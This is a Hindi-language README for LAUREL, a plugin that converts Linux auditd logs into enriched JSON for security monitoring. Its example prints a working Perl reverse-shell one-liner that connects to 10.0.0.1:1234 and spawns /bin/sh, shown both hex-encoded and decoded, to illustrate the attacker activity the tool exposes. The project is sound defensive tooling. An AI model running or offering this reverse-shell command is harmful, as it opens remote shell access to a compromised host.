
लिनक्स ऑडिट लॉग को SIEM उपयोग के लिए रूपांतरित करें
LAUREL auditd(8) के लिए एक ईवेंट पोस्ट-प्रोसेसिंग प्लगइन है जो आधुनिक सुरक्षा निगरानी सेटअप के लिए उपयोगी, समृद्ध JSON-आधारित ऑडिट लॉग उत्पन्न करता है।
नवीनतम स्थिर रिलीज़ के अनुरूप दस्तावेज़ीकरण यहाँ पाया जा सकता है।
TLDR: ऐसे ऑडिट इवेंट के बजाय जो इस तरह दिखते हैं…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…LAUREL उन्हें JSON लॉग में बदल देता है जहां हमलावरों/पेनिट्रेशन टेस्टर्स/रेड टीमर्स द्वारा बनाई गई गड़बड़ी पहली नज़र में स्पष्ट हो जाती है:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
यह स्रोत पर होता है क्योंकि LAUREL उस होस्ट पर चलता है जहां ऑडिट इवेंट उत्पन्न होते हैं। इवेंट को पैरेंट प्रोसेस (ppid) के बारे में उपयोगी जानकारी के साथ समृद्ध किया जाता है:
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
कॉन्फ़िगरेशन और संचालन विवरण laurel(8) मैनुअल पेज में वर्णित हैं। लॉग प्रारूप और तर्कों के बारे में विवरण laurel-about(7) मैनुअल पेज में पाया जा सकता है। laurel-audit-rules(7) पेज में हमलावरों की रणनीति का पता लगाने के लिए उपयोगी ऑडिट नियमों को कॉन्फ़िगर करने के लिए सलाह और उदाहरण हैं।
LAUREL स्थापना निर्देश में LAUREL को स्रोत से बनाने और इसे स्थापित करने और कॉन्फ़िगर करने के निर्देश शामिल हैं।
हमने LAUREL विकसित किया क्योंकि हम मौजूदा परियोजनाओं और उत्पादों की सुविधा सेट और प्रदर्शन विशेषताओं से संतुष्ट नहीं थे। कृपया विवरण के लिए प्रदर्शन दस्तावेज़ देखें।
GNU जनरल पब्लिक लाइसेंस, संस्करण 3
लोगो बिरगिट मेयर <[email protected]> द्वारा बनाया गया था।